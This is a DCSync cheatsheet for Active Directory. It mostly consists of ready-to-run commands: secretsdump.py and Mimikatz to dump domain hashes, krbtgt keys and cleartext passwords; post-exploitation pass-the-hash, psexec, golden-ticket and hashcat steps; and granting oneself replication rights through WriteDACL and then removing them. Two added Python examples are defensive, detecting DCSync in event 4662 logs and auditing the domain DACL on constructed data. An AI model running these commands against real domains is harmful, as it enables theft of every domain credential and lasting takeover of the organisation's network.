DCSync Cheatsheet
Quick reference for verifying DCSync rights and performing the attack from Linux and Windows.
Verify DCSync Rights
PowerView
$sid = (Convert-NameToSid <USER>)
Get-ObjectAcl "DC=domain,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} | select AceQualifier, ObjectDN, ActiveDirectoryRights, SecurityIdentifier, ObjectAceType | fl
Both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All must be AccessAllowed.
BloodHound
Use the pre-built query: "Find Principals with DCSync Rights"
Perform DCSync — Linux (secretsdump.py)
# Full dump: NTLM hashes + Kerberos keys + cleartext passwords
secretsdump.py -outputfile hashes -just-dc DOMAIN/user@DC_IP
# NTLM hashes only
secretsdump.py -outputfile hashes -just-dc-ntlm DOMAIN/user@DC_IP
# Single user
secretsdump.py -just-dc-user administrator DOMAIN/user@DC_IP
# With pass-the-hash
secretsdump.py -just-dc-ntlm -hashes :NTLM_HASH DOMAIN/user@DC_IP
# With password age and account status (for reporting)
secretsdump.py -outputfile hashes -just-dc -pwd-last-set -user-status DOMAIN/user@DC_IP
# Include password history
secretsdump.py -outputfile hashes -just-dc -history DOMAIN/user@DC_IP
Output Files (-just-dc)
| File | Contents |
|---|---|
| *.ntds | NTLM hashes |
| *.ntds.kerberos | Kerberos keys |
| *.ntds.cleartext | Cleartext passwords (reversible encryption accounts) |
Perform DCSync — Windows (Mimikatz)
# Run as user with DCSync rights (if not already)
runas /netonly /user:DOMAIN\user powershell
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:DOMAIN.LOCAL /user:DOMAIN\administrator
mimikatz # lsadump::dcsync /domain:DOMAIN.LOCAL /user:DOMAIN\krbtgt
mimikatz # lsadump::dcsync /domain:DOMAIN.LOCAL /all /csv
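Both the secretsdump.py commands and the Mimikatz commands above make the same DRSUAPI replication request to the DC, so they leave the same trace: with the "Audit Directory Service Access" subcategory enabled and a SACL on the domain object that audits Control Access, the DC writes Security event 4662 whose Properties field lists the GUIDs of the replication rights requested. The following is an added Python example, not part of Mimikatz, impacket or any SIEM, showing the matching detection logic over a batch of constructed 4662 records; it assumes the events were already parsed into dicts keyed by the EventData field names, and the account names, times and trusted-replicator list are all made up.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662.

Added example, not part of Mimikatz, impacket or any SIEM. Assumes the 4662
records were already parsed into dicts with the EventData field names
(SubjectUserName, AccessMask, Properties, ...) and that the DC audits
Directory Service Access with a SACL on the domain object covering Control
Access. All events, names and times below are constructed.
"""
import re

REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # the only access type a replication request needs
GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")


def replication_rights_in(properties):
    """Replication-right names whose GUIDs occur in the 4662 Properties field."""
    found = {g.lower() for g in GUID_RE.findall(properties)}
    return {name for guid, name in REPLICATION_GUIDS.items() if guid in found}


def classify_4662(event, trusted_replicators):
    """Return (actor, rights) for a replication request made by an account that
    is not expected to replicate, otherwise None."""
    if event.get("EventID") != 4662:
        return None
    try:
        mask = int(str(event.get("AccessMask", "0")), 16)  # logged as hex text such as "0x100"
    except ValueError:
        return None
    if not mask & CONTROL_ACCESS:
        return None
    rights = replication_rights_in(event.get("Properties", ""))
    if not rights:
        return None
    user = event.get("SubjectUserName", "")
    # Compare against an explicit list of accounts that legitimately replicate
    # (domain controllers, the Azure AD Connect account). Filtering on every
    # name ending in "$" instead would also hide a request made with a
    # compromised computer account.
    if user.lower() in trusted_replicators:
        return None
    return f"{event.get('SubjectDomainName', '')}\\{user}", sorted(rights)


def detect(events, trusted_replicators):
    """Run classify_4662 over a batch of events, keeping the hits in log order."""
    return [hit for hit in (classify_4662(e, trusted_replicators) for e in events) if hit]


def _props(*guids):
    # Properties as the DC renders it: the access type, the GUIDs of the
    # control-access rights requested, then the object class (domainDNS).
    return ("Control Access\n\t" + "\n\t".join(f"{{{g}}}" for g in guids)
            + "\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}")


GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

# Constructed batch: one DC replicating, one service account doing a full
# DCSync, an unrelated write, a logon event, and a request for Get-Changes only.
SAMPLE_EVENTS = [
    {"EventID": 4662, "TimeCreated": "2024-03-01T02:00:11Z", "SubjectUserName": "DC02$",
     "SubjectDomainName": "CORP", "AccessMask": "0x100",
     "Properties": _props(GET_CHANGES, GET_CHANGES_ALL)},
    {"EventID": 4662, "TimeCreated": "2024-03-01T02:14:37Z", "SubjectUserName": "svc_backup",
     "SubjectDomainName": "CORP", "AccessMask": "0x100",
     "Properties": _props(GET_CHANGES, GET_CHANGES_ALL)},
    {"EventID": 4662, "TimeCreated": "2024-03-01T02:15:02Z", "SubjectUserName": "jdoe",
     "SubjectDomainName": "CORP", "AccessMask": "0x20",
     "Properties": "Write Property\n\t{00000000-0000-0000-0000-00000000abcd}"},  # made-up attribute GUID
    {"EventID": 4624, "TimeCreated": "2024-03-01T02:15:40Z", "SubjectUserName": "jdoe",
     "SubjectDomainName": "CORP"},
    {"EventID": 4662, "TimeCreated": "2024-03-01T02:16:09Z", "SubjectUserName": "jdoe",
     "SubjectDomainName": "CORP", "AccessMask": "0x100", "Properties": _props(GET_CHANGES)},
]
TRUSTED_REPLICATORS = {"dc01$", "dc02$"}  # constructed: this domain's DCs

if __name__ == "__main__":
    for actor, rights in detect(SAMPLE_EVENTS, TRUSTED_REPLICATORS):
        print(f"replication request by {actor}: {', '.join(rights)}")
```

A hit that carries DS-Replication-Get-Changes-All from anything other than a DC or the directory-sync account is the high-confidence signal; Get-Changes alone is worth keeping at lower severity, since without -All the request cannot return secrets but still shows someone asking.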
Find Accounts with Reversible Encryption
# Built-in cmdlet
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
# PowerView
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} | select samaccountname,useraccountcontrol
secretsdump.py decrypts these automatically when run with -just-dc (the -just-dc-ntlm variant skips them) and writes them to *.ntds.cleartext.
Post-DCSync
| Action | Command |
|---|---|
| Pass-the-Hash | crackmapexec smb DC_IP -u administrator -H <NTLM_HASH> |
| Pass-the-Hash (psexec) | psexec.py -hashes :NTLM_HASH DOMAIN/administrator@DC_IP |
| Golden Ticket (Mimikatz) | kerberos::golden /user:administrator /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ptt |
| Crack hashes | hashcat -m 1000 hashes.ntds /usr/share/wordlists/rockyou.txt |
Grant DCSync Rights (if you have WriteDACL)
# Grant replication rights to a controlled user
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity <YOUR_USER> -Rights DCSync
# Perform DCSync, then remove the rights
Remove-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity <YOUR_USER> -Rights DCSync
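The PowerView check under Verify DCSync Rights and the Add-/Remove-DomainObjectAcl pair above both come down to the same ACEs on the domain root: object-specific ACEs granting Control Access (CR) for the two replication GUIDs, or a plain full-control ACE that covers every extended right. The following is an added Python example, not PowerView, Microsoft or impacket code, that audits those ACEs offline from the domain object's SDDL string (for example the .Sddl property of Get-Acl "AD:\DC=domain,DC=local"), resolving the replication GUIDs the way Get-ObjectAcl -ResolveGUIDs does and handling the cases a one-line filter misses: inherit-only ACEs, hex right masks, and explicit denies. The SDDL and the S-1-5-21-... domain SID below are constructed.

```python
"""Audit a domain object's DACL for principals that can DCSync.

Added example, not PowerView or Microsoft code. Input is the SDDL string of
the domain root, e.g. (Get-Acl "AD:\\DC=domain,DC=local").Sddl. The output
resolves the replication-right GUIDs offline as Get-ObjectAcl -ResolveGUIDs
does. The SDDL below is constructed and the S-1-5-21-... domain SID is made up.
"""
import re

REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100    # ADS_RIGHT_DS_CONTROL_ACCESS, "CR" in SDDL
GENERIC_ALL = 0x10000000  # "GA" in SDDL, implies every right
WELL_KNOWN = {"DA": "Domain Admins", "EA": "Enterprise Admins", "SY": "Local System",
              "BA": "Builtin Administrators", "AU": "Authenticated Users"}

# O:owner G:group D:flags(ace)(ace)... S:flags(ace)...; only the DACL is used here.
SDDL_RE = re.compile(
    r"^(?:O:(?:S-[0-9-]+|[A-Z]{2}))?(?:G:(?:S-[0-9-]+|[A-Z]{2}))?"
    r"(?:D:(?P<dflags>[A-Z]*)(?P<dacl>(?:\([^)]*\))*))?"
    r"(?:S:[A-Z]*(?:\([^)]*\))*)?$"
)
ACE_RE = re.compile(r"\(([^)]*)\)")


def sddl_codes(field):
    """Split an SDDL flag or rights field such as 'CIIO' into its two-letter codes."""
    return {field[i:i + 2] for i in range(0, len(field), 2)}


def grants_control_access(rights):
    """True if the ACE rights field includes Control Access (as codes or a hex mask)."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & (CONTROL_ACCESS | GENERIC_ALL))
    return bool(sddl_codes(rights) & {"CR", "GA"})


def replication_rights_covered(object_guid):
    """Replication rights an ACE's object GUID covers; no GUID means every extended right."""
    guid = object_guid.lower()
    if guid == "":
        return set(REPLICATION_GUIDS.values())
    return {REPLICATION_GUIDS[guid]} if guid in REPLICATION_GUIDS else set()


def replication_rights(sddl):
    """Map each principal in the DACL to the replication rights it effectively holds."""
    m = SDDL_RE.match(sddl.strip())
    if not m or m.group("dacl") is None:
        raise ValueError("no DACL in SDDL string")
    allowed, denied = {}, {}
    for ace in ACE_RE.findall(m.group("dacl")):
        fields = ace.split(";")
        if len(fields) < 6:
            continue
        ace_type, flags, rights, object_guid, _inherit_guid, sid = fields[:6]
        if ace_type not in ("A", "OA", "D", "OD"):  # audit/alarm/callback ACEs grant nothing
            continue
        if "IO" in sddl_codes(flags):  # inherit-only: applies to children, not this object
            continue
        if not grants_control_access(rights):
            continue
        covered = replication_rights_covered(object_guid)
        if not covered:
            continue
        principal = WELL_KNOWN.get(sid, sid)
        bucket = allowed if ace_type in ("A", "OA") else denied
        bucket.setdefault(principal, set()).update(covered)
    # an explicit deny removes the right whatever the ACE order in the string
    effective = {p: r - denied.get(p, set()) for p, r in allowed.items()}
    return {p: r for p, r in effective.items() if r}


def dcsync_capable(sddl):
    """Principals holding both rights DCSync needs: Get-Changes and Get-Changes-All."""
    needed = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}
    return sorted(p for p, r in replication_rights(sddl).items() if needed <= r)


DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed
SAMPLE_SDDL = "O:DAG:DAD:AI" + "".join([
    f"(OD;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{DOMAIN_SID}-1108)",  # deny Get-Changes-All
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{DOMAIN_SID}-1105)",
    f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{DOMAIN_SID}-1105)",  # 1105: both rights
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{DOMAIN_SID}-1106)",  # 1106: Get-Changes only
    f"(OA;CIIO;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{DOMAIN_SID}-1107)",  # inherit-only
    f"(OA;;CR;;;{DOMAIN_SID}-1108)",                     # all extended rights, minus the deny above
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)",               # full control covers every extended right
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)",
    "(A;;RPLCLORC;;;AU)",                                 # read only, no control access
    "(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;AU)",  # User-Change-Password, unrelated
])

if __name__ == "__main__":
    for principal, rights in sorted(replication_rights(SAMPLE_SDDL).items()):
        print(principal, sorted(rights))
    print("DCSync-capable:", dcsync_capable(SAMPLE_SDDL))
```

Anything in the DCSync-capable list that is not a DC, Domain Admins, Enterprise Admins, Local System or the directory-sync account is the finding; a single ACE that grants only one of the two rights (1106 above) is not enough, which is why the Verify DCSync Rights note requires both to be AccessAllowed.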